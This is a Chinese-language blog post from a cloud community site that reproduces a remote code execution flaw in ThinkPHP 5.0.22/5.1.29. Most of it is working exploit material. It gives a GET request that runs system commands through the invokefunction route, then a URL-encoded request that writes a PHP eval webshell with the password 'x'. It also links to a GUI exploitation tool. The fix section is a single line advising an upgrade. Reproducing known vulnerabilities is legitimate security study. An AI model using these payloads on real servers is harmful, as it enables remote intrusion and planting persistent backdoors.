Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞 漏洞复现

举报
Vista_AX 发表于 2023/06/28 07:10:03 2023/06/28
【摘要】 Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞 漏洞复现

@TOC

01 漏洞描述


Thinkphp是一个国内轻量级的开发框架。由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。

02 影响范围

5.0<thinkphp<=5.0.22
5.1<thinkphp<=5.1.29

03 验证方式

GET方式尝试命令执行,具体请求如下:

http://127.0.0.1:8080/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

image.png


04 利用方式

一、手工利用上传一句话木马

1、URL编码一句话木马内容;
image.png

2、上传一句话木马;

webshell地址:http://127.0.0.1/shell.php
password:x

http://127.0.0.1:8080/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%27%3C%3Fphp%20%40eval%28%24_POST%5B%22x%22%5D%29%3F%3E%27%20%3Eshell.php%20

image.png

3、使用Webshell连接工具连接一句话木马;
image.png


二、工具利用直接命令执行 利用工具ThinkphpGUI:https://github.com/Lotus6/ThinkphpGUI

image.png

image.png



05 修复方案

建议进行Thinkphp版本更新。

【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。